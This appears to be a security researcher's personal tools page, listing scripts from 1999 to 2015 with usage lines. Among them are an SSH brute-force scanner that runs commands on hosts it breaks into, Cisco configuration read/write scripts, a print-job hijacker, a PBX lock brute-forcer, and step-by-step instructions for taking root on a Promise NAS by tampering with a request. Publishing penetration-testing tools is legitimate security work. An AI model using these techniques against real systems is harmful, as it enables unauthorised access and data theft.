Home Documents Projects Unsorted Archive Links Files

Python SSH [brute force] scanner (v1.0 Oct 2015)
Because there's always room for one more SSH brute force scanner. This one can both scan single and multiple hosts and subnets, attempt multiple logins and execute a given command once successful.

To scan a single host on port 1022 with the username of 'foo', the password of 'bar', give up after trying to connect for 1 second, and if successful, run 'id' on the host, do:
  ./pysshscan.py --host 192.168.0.64 --user foo --pass bar --command 'id' --port 1022 --timeout 1
To scan a single subnet with a file full of usernames and a file full of passwords, do:
  ./pysshscan.py --host 192.168.0.0/16 --ufile usernames.txt --pfile passwords.txt --command 'id' --timeout 1
To scan multiple targets, use a file full of subnets and hosts, like so:
  ./pysshscan.py --hfile targets.txt --user test --pass test --command 'w'
Download pysshscan.py today! (It requires the Python paramiko and netaddr libraries to work -- both are easy to install).
Read/Write Cisco configuration via SNMP (v1.0 Apr 2013)
I wrote a couple of KSH scripts to read and write Cisco running-configuration using SNMP if you know the RW community.
  ./getconfig.sh private 10.10.10.1 192.168.16.1 
The above will copy the running-configuration to 10.10.10.1-config to the tftp server at 192.168.16.1, and:
  ./putconfig.sh private 10.10.10.1 192.168.16.1 modified-config 
which will write the contents of 'modified-config' to the router at 10.10.10.1. The two scripts are getconfig.sh and putconfig.sh and should be self-explanatory.
Apache "/server-status" scanner (v1.0 Oct 2012)
An old issue resurfaced in the news recently, that many Apache servers were leaking information via its /server-status page. Login pages using GET requests may be particularly vulnerable (leaking login parameters in the URL). This Ruby tool takes either a domain name as input or none at all (then tries to find some likely candidates).

For example, try:
   ./grabstatus.rb example.com | egrep -i '(=>|GET)'
More examples in the code. Find it here. Please note that you need rubygems and the sanitize gem to make it work.
A Perl proxy mapper (v0.2 29 Nov 2011)
Found an open (reverse) proxy? Keen to see what it's able to connect to? Don't want to do it by hand? The Perl tool, proxymap.pl, takes the following arguments:
$ ./proxymap.pl -h
proxymap.pl v0.2 (c) 2011 th@bogus.net
usage: proxymap.pl [-h|-s|-b] [-p <port>] [-ph <proxy>] [-pp <proxy>] [-m <timeout>]] -t <target>
-h : this
-b : print returned response body on success
-t : targets to test for (range support in last octet: e.g. 192.168.0.1-255)
-p : target port(s) (default: 80)
-ph : proxy to use (default: 193.214.208.185)
-pp : proxy port to use (default: 8080)
-m : timeout (seconds) before giving up, default: 5
-s : probe scan (map permitted ports in proxy)
Please note that the default proxy won't work for you. Sorry.
Simple Perl TCP port scanner (21 Oct 2011)
Sometimes, nmap just can't be used, but Perl can! Scan TCP ports with this little tool.
SIPping.pl - A quick application level "ping" for SIP (v1.0, Jan 2011)
This little Perl utility checks the availability of a SIP server by sending a bogus REGISTER request and observing the response. It is called sipping.pl.
Backup - A configurable Perl wrapper for 'rsync' (v1.9, Jun 2010)
A friend needed a quick and easy way to make backups using 'rsync'; new in 1.8 is support for testing that a file exists in the destination directory before trying to execute the backup. Helpful if the backup destination exists on e.g. NFS or SMB shares. Find the README here. Find the Perl utility here. If you want incremental backups, this tool is not for you.
Modifying the Linksys WRT54GL to accept power via Ethernet (Sep 2009)
Two sites provided some useful information on this subject. Here is a note to self.
VirtualBox and problematic VMWare XP images (Apr 2009)
I had a small issue trying to get a Windows XP .vmdk image to boot in VirtualBox. If you get a BSOD on boot, you might want to read the STOP 7B ERROR notes on how to recover from this problem. Note: You need to obtain a copy of ERD Commander, Hirens Boot CD or similar boot media.
Stripping headers off Nortel RTP streams (Oct 2008)
nortel-rtp-stripper.pl is a little Perl hack that strips the RTP headers off Nortel voice streams so they can be imported into Audacity as A-Law, 8000Hz without the annoying "buzzing" you get (if imported directly from Wireshark). Useful if you have obtained voice intercepts on a Nortel VoIP network. (Keywords: UDP port 5200, RUDP, RTP)
Directory management with Prunedir (v1.10 Mar 2008)
This little Perl snippet will prune your directories (e.g. say you want to only have 10 directory entries in a directory and remove the oldest first). Use with care. I'll write a README later, in the meantime, do:

   prunedir.pl -h

This will give you some very basic help. It's probably not the most elegant way of pruning directories (especially as we're calling ls externally rather than using opendir()), but this was a quick hack for a friend who kept asking for more options!

NOTE: If you don't wish to prune certain directories, edit the @IGNORE array within the source code.
Changing the 'root' password on a Promise NAS NS4300N (Sep 2007)
Ok, forget the "admin access" hack below. Enabling 'root' access directly is a far easier task and only requires a web browser and intercepting proxy of some kind (Paros, Burp, take your pick). Login with the 'admin' account and go to the "User Management" -> "Change Password" form. Select any user, and enter the password of your choice. Intercept the POST request to /usercp.php and change the value of the 'user' parameter to 'root'. That's it. Root's password has changed to something you know and has telnet access enabled. Login to the NAS directly by telnet'ing to port 2380/tcp. NOTE: My NS4300N is running firmware version 1.1.0.5; this may not work on later versions (let me know though!). You may want to try http://mike.makuch.org/?p=89 if you have a newer firmware.
Brute-DNS, the host guesser (v1.4, Sep 2007)
I resurrected an old tool. The new version will test a bunch of different words and derivatives (e.g. "wwwa", "www-a", "www-01" and so forth). The Perl code still calls the Unix 'host' command though, which is pretty lame, but it works quite well. It still allows the use of wordlists, but not from STDIN. Try "-h" for help. Find it here.
Enabling 'admin' access on a Promise NAS NS4300N (Aug 2007)
So, I got myself a Promise SmartStor NS4300N, but didn't have much luck with the squashfs filesystem. Luckily Google came to the rescue and someone named "rosvall" posted an excellent solution! Thanks! You can find it here. In case that place disappears, I wrote a README. I also provide the binary I used to enable the login here.
HP JetDirect Print Job Hijacker (v1.2, 2006)
This tool has been lying around in files/ since 2006. The 9k1-hijacker.pl tool is useful if you have access to a printer's configuration (usually unpassworded), or if you are able to spoof the printer's IP address (ARP poisoning). Basically, it is used to man-in-the-middle (MITM) print jobs -- it allows you to steal print jobs transparently (it makes a local copy before forwarding it to the printer).
Realitis PBX Brute Force OSL Guessing Tool (v1.0, 2006)
This tool will try to brute force the Open System Lock (OSL) on PBX's that run the Siemens Realitis software. The README describes its use as well as requirements and also gives you a few hints on where to look for information leakage should you come across this thing on your travels.
OpenVPN DNS resolver updater - resolvfix.pl (v0.01, 2006)
A tool for *nix users of OpenVPN. It updates the DNS resolver configuration depending on whether you start or stop the OpenVPN process. Essentially, drop the Perl script in /usr/local/bin and add the following lines to your config.ovpn file:
   up /usr/local/bin/resolvfix.pl
   down /usr/local/bin/resolvfix.pl
OpenBSD patch for RainbowCrack v1.2 (11 May 2004)
In 2004, RainbowCrack didn't work on OpenBSD, so I wrote a patch.
SFVDir (v1.8, 24 Jul 2003)
SFV is a CRC checker. A friend wanted something that could execute SFV recursively for a given directory, so I wrote a Perl wrapper for it. To use the wrapper, you'll need the SFV tool itself (pdsfv is known to work).
CA AMO Unicenter Password Recovery Tool (v1.2, 19 Feb 2003)
I doubt anyone uses this asset management software anymore, but this is a tool I wrote that will recover the encrypted passwords (yay!).
OpenSSL v0.9.6l and OpenVPN v1.5 for Familiar Linux (Feb 2002)
I needed these ARM binaries for my Linux iPaq, so I built them and thought others might want them too. There could be ipkg's for these things now, so check that first before you use these old ones!
Cisco Configuration Grabber (2002)
This is a tool to automate exploitation of the old HTTP authentication bypass bug in old Cisco IOS. For more information about the bug, check http://www.securiteam.com/securitynews/5PP0L2K4KY.html.
Quotenotifier (v0.17, Aug 2001)
A piece of Perl that will display stock quotes on your HP printer (among other things).
CryptoCard(tm) Challenge/Response Authentication Patch for Bash (v1.0, 7 Apr 2001)
I wrote this patch for Bourne Again Shell (Bash) v2.04 for someone who was using it as a login shell. There's a README and also some supporting documentation (thanks, Simon!) and a key generation tool for card management. It's a straightforward patch and shouldn't be too hard to port to newer versions if you need to. (It only asks for a challenge when Bash is run as a login shell.)
Beale Ciphers (Oct 1999)
I was on a plane reading about Beale ciphers, so I wrote some Perl to help solve them (haha!) or make your own! Great fun.
BIND Version Query Tool (29 Sep 1999)
This is a patched version of bindinfo.c by Joshua James Drake. All the patch does is set the source port to 53. I needed the tool to pass through a poorly configured packet filter one day. These days, use 'nmap -g53' with your service scan options set.